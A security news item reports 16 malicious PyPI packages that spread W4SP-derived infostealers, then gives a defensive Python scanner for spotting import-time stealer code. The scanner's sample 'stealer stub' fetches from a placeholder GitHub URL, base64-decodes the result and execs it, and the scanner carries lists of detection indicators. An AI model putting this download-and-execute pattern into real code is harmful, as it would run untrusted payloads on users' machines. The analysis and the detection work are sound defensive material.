W4SP stealer variants sting PyPI users

Two weeks ago, the research group Phylum reported that the PyPI repository hosted a set of 47 packages that infected their victims with the W4SP infostealer. That campaign was cut short after GitHub took down the repository the attackers were using to host the payload.

More recently, however, Phylum discovered 16 new PyPI packages distributing ten different infostealers (for example Celestial Stealer, ANGEL Stealer, Satan Stealer, @skid Stealer and Leaf $tealer), all of them derived from the W4SP code base.

The malicious packages found by the researchers, with their download counts at the time of the report:

  • modulesecurity – 114 downloads;
  • informmodule – 110 downloads;
  • chazz – 118 downloads;
  • randomtime – 118 downloads;
  • proxygeneratorbil – 91 downloads;
  • easycordey – 122 downloads;
  • easycordeyy – 103 downloads;
  • tomproxies – 150 downloads;
  • sys-ej – 186 downloads;
  • py4sync – 453 downloads;
  • infosys – 191 downloads;
  • sysuptoer – 186 downloads;
  • nowsys – 202 downloads;
  • upamonkws – 205 downloads;
  • captchaboy – 123 downloads;
  • proxybooster – 69 downloads.

Of all the packages above, only chazz follows the full W4SP attack chain, which runs through several stages and obfuscates its code. The rest skip that and place the stealer code directly in "main.py" or "__init__.py", so it runs as soon as the package is imported.

chazz, in turn, drops a copy of the Leaf $tealer infostealer and obfuscates the code with the BlankOBF tool.

All of the new malicious packages repeat the W4SP tactic of pulling the payload from GitHub repositories. It is still unclear who is behind the distribution of the packages, but Phylum suggests it is the work of several different threat actors rather than a single group.
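The two traits described above (stealer logic pasted straight into "__init__.py" or "main.py", and a payload fetched from GitHub) are cheap to screen for in an unpacked sdist or wheel before it is installed. The following scanner is an added example, not code from the article or from Phylum's tooling: it flags a source file that executes dynamically built code (exec, eval, compile, __import__) and also decodes it, downloads it, or references a GitHub URL. The package sources it scans are constructed here; the raw.githubusercontent.com path in the sample is a placeholder, not a real payload location, and the package names badpkg/goodpkg are invented.

```python
"""Heuristic scan of unpacked Python packages for the W4SP-style pattern:
code run at import time that was decoded or fetched, often from GitHub.

Added example, not the article's or Phylum's code. Constructed sample
sources are embedded so it runs offline.
"""
import ast
import re
import tempfile
from pathlib import Path

# Files the report singles out as the place the stealer code is dropped.
ENTRY_FILES = {"__init__.py", "main.py"}

GITHUB_URL = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|gist\.githubusercontent\.com|github\.com)/",
    re.IGNORECASE,
)
EXEC_CALLS = {"exec", "eval", "compile", "__import__"}
DECODE_CALLS = {"b64decode", "b32decode", "a85decode", "b85decode", "decompress", "fromhex"}
FETCH_CALLS = {"urlopen", "urlretrieve", "requests.get", "requests.post", "httpx.get"}


def _call_name(func):
    """'exec' for exec(...), 'base64.b64decode' for base64.b64decode(...),
    'urlopen' for urllib.request.urlopen(...) (only the last attribute survives)."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        if isinstance(func.value, ast.Name):
            return f"{func.value.id}.{func.attr}"
        return func.attr
    return None


def scan_source(src):
    """Count the indicators present in one file's source text."""
    hits = {"dynamic_exec": 0, "decode": 0, "fetch": 0, "github_url": 0, "unparseable": False}
    # Regex over raw text: a GitHub URL is worth noting even if the file will not parse.
    hits["github_url"] = len(GITHUB_URL.findall(src))
    try:
        tree = ast.parse(src)
    except SyntaxError:
        hits["unparseable"] = True  # obfuscated or garbled source is itself a signal
        return hits
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node.func)
        if name is None:
            continue
        short = name.rsplit(".", 1)[-1]
        if short in EXEC_CALLS:
            hits["dynamic_exec"] += 1
        elif short in DECODE_CALLS:
            hits["decode"] += 1
        elif name in FETCH_CALLS or short in FETCH_CALLS:  # dict.get stays unflagged
            hits["fetch"] += 1
    return hits


def is_suspicious(hits):
    """Executing code that was decoded, downloaded, or that references GitHub."""
    return hits["dynamic_exec"] > 0 and (
        hits["decode"] > 0 or hits["fetch"] > 0 or hits["github_url"] > 0
    )


def scan_package(root):
    """Scan every .py file under root; return {relative path: hits} for flagged files,
    marking whether the file is one of the entry files the report names."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.py")):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if is_suspicious(hits):
            hits["entry_file"] = path.name in ENTRY_FILES
            report[path.relative_to(root).as_posix()] = hits
    return report


# Constructed samples, not code from any real package. The URL is a placeholder.
SAMPLE_STEALER_STUB = '''
import base64
import urllib.request
_blob = urllib.request.urlopen(
    "https://raw.githubusercontent.com/example-org/example-repo/main/payload.txt"
).read()
exec(compile(base64.b64decode(_blob), "<payload>", "exec"))
'''

SAMPLE_BENIGN = '''
import json
def load_config(path):
    with open(path) as fh:
        return json.load(fh)
'''


def demo():
    """Lay the samples out as two packages in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = Path(tmp) / "badpkg"
        bad.mkdir()
        (bad / "__init__.py").write_text(SAMPLE_STEALER_STUB)
        good = Path(tmp) / "goodpkg"
        good.mkdir()
        (good / "__init__.py").write_text(SAMPLE_BENIGN)
        (good / "main.py").write_text(SAMPLE_BENIGN)
        return scan_package(tmp)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Point scan_package at the directory left by `pip download --no-deps --no-binary :all: <name>` followed by `tar xf`, or at an unzipped wheel. The heuristic is deliberately crude: it will miss a stealer that is written in plain Python with no decoding or download step, and it will flag legitimate plugin loaders that exec fetched code, so treat a hit as a prompt to read the file, not as a verdict.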
